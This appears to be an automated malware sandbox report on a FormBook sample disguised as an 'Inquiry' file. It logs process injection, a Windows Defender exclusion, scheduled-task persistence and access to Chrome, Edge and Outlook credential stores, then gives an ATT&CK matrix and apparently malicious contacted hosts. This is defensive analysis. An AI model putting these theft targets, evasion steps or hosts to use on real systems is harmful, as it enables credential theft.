            Source: C:\Windows\SysWOW64\sfc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exeProcess created: C:\Windows\SysWOW64\sfc.exe "C:\Windows\SysWOW64\sfc.exe"
            Source: TsdBVAGjsKVoi.exe, 00000010.00000002.3787501024.0000000001AC1000.00000002.00000001.00040000.00000000.sdmp, TsdBVAGjsKVoi.exe, 00000010.00000000.1569221895.0000000001AC1000.00000002.00000001.00040000.00000000.sdmp, TsdBVAGjsKVoi.exe, 00000012.00000000.1710445317.0000000000F81000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
            Source: TsdBVAGjsKVoi.exe, 00000010.00000002.3787501024.0000000001AC1000.00000002.00000001.00040000.00000000.sdmp, TsdBVAGjsKVoi.exe, 00000010.00000000.1569221895.0000000001AC1000.00000002.00000001.00040000.00000000.sdmp, TsdBVAGjsKVoi.exe, 00000012.00000000.1710445317.0000000000F81000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: TsdBVAGjsKVoi.exe, 00000010.00000002.3787501024.0000000001AC1000.00000002.00000001.00040000.00000000.sdmp, TsdBVAGjsKVoi.exe, 00000010.00000000.1569221895.0000000001AC1000.00000002.00000001.00040000.00000000.sdmp, TsdBVAGjsKVoi.exe, 00000012.00000000.1710445317.0000000000F81000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: TsdBVAGjsKVoi.exe, 00000010.00000002.3787501024.0000000001AC1000.00000002.00000001.00040000.00000000.sdmp, TsdBVAGjsKVoi.exe, 00000010.00000000.1569221895.0000000001AC1000.00000002.00000001.00040000.00000000.sdmp, TsdBVAGjsKVoi.exe, 00000012.00000000.1710445317.0000000000F81000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeQueries volume information: C:\Users\user\Desktop\Inquiry PR#27957.bat.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeQueries volume information: C:\Users\user\AppData\Roaming\fuqwoDzun.exe VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000009.00000002.1645996592.00000000015A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.1645343377.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.3788281912.0000000002F50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.3788326451.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.3788150976.0000000003C10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.3791731697.00000000050A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.3785830120.0000000000A50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.1956019902.0000000000C90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.1647315768.0000000002340000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.3788370711.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.1858896914.0000000003320000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\sfc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\sfc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000009.00000002.1645996592.00000000015A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.1645343377.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.3788281912.0000000002F50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.3788326451.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.3788150976.0000000003C10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.3791731697.00000000050A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.3785830120.0000000000A50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.1956019902.0000000000C90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.1647315768.0000000002340000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.3788370711.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.1858896914.0000000003320000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Scheduled Task/Job            		1
            Scheduled Task/Job            		612
            Process Injection            		1
            Masquerading            		1
            OS Credential Dumping            		221
            Security Software Discovery            		Remote Services1
            Email Collection            		1
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/Job1
            DLL Side-Loading            		1
            Scheduled Task/Job            		11
            Disable or Modify Tools            		LSASS Memory2
            Process Discovery            		Remote Desktop Protocol1
            Archive Collected Data            		3
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            Abuse Elevation Control Mechanism            		41
            Virtualization/Sandbox Evasion            		Security Account Manager41
            Virtualization/Sandbox Evasion            		SMB/Windows Admin Shares1
            Data from Local System            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
            DLL Side-Loading            		612
            Process Injection            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput Capture4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information            		LSA Secrets1
            File and Directory Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Abuse Elevation Control Mechanism            		Cached Domain Credentials113
            System Information Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
            Obfuscated Files or Information            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
            Software Packing            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
            DLL Side-Loading            		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1470000 Sample: Inquiry PR#27957.bat.exe Startdate: 09/07/2024 Architecture: WINDOWS Score: 100 69 www.u9games.xyz 2->69 71 www.j51a.xyz 2->71 73 19 other IPs or domains 2->73 81 Snort IDS alert for network traffic 2->81 83 Malicious sample detected (through community Yara rule) 2->83 85 Sigma detected: Scheduled temp file as task from temp location 2->85 89 10 other signatures 2->89 10 Inquiry PR#27957.bat.exe 7 2->10         started        14 fuqwoDzun.exe 5 2->14         started        signatures3 87 Performs DNS queries to domains with low reputation 71->87 process4 file5 55 C:\Users\user\AppData\Roaming\fuqwoDzun.exe, PE32 10->55 dropped 57 C:\Users\...\fuqwoDzun.exe:Zone.Identifier, ASCII 10->57 dropped 59 C:\Users\user\AppData\Local\...\tmp2C94.tmp, XML 10->59 dropped 61 C:\Users\...\Inquiry PR#27957.bat.exe.log, ASCII 10->61 dropped 91 Writes to foreign memory regions 10->91 93 Allocates memory in foreign processes 10->93 95 Adds a directory exclusion to Windows Defender 10->95 16 RegSvcs.exe 10->16         started        19 powershell.exe 23 10->19         started        21 powershell.exe 23 10->21         started        23 schtasks.exe 1 10->23         started        97 Multi AV Scanner detection for dropped file 14->97 99 Machine Learning detection for dropped file 14->99 101 Injects a PE file into a foreign processes 14->101 25 RegSvcs.exe 14->25         started        27 schtasks.exe 1 14->27         started        signatures6 process7 signatures8 75 Maps a DLL or memory area into another process 16->75 29 TsdBVAGjsKVoi.exe 16->29 injected 77 Loading BitLocker PowerShell Module 19->77 32 WmiPrvSE.exe 19->32         started        34 conhost.exe 19->34         started        36 conhost.exe 21->36         started        38 conhost.exe 23->38         started        40 TsdBVAGjsKVoi.exe 25->40 injected 42 conhost.exe 27->42         started        process9 signatures10 111 Found direct / indirect Syscall (likely to bypass EDR) 29->111 44 sfc.exe 13 29->44         started        113 Maps a DLL or memory area into another process 40->113 47 sfc.exe 40->47         started        process11 signatures12 103 Tries to steal Mail credentials (via file / registry access) 44->103 105 Tries to harvest and steal browser information (history, passwords, etc) 44->105 107 Modifies the context of a thread in another process (thread injection) 44->107 109 3 other signatures 44->109 49 TsdBVAGjsKVoi.exe 44->49 injected 53 firefox.exe 44->53         started        process13 dnsIp14 63 huayang.302.gn301.xyz 154.12.34.252, 49740, 49741, 49742 UNMETEREDCA United States 49->63 65 www.dtalengineering.com 103.42.108.46, 49716, 49717, 49718 SYNERGYWHOLESALE-APSYNERGYWHOLESALEPTYLTDAU Australia 49->65 67 10 other IPs or domains 49->67 79 Found direct / indirect Syscall 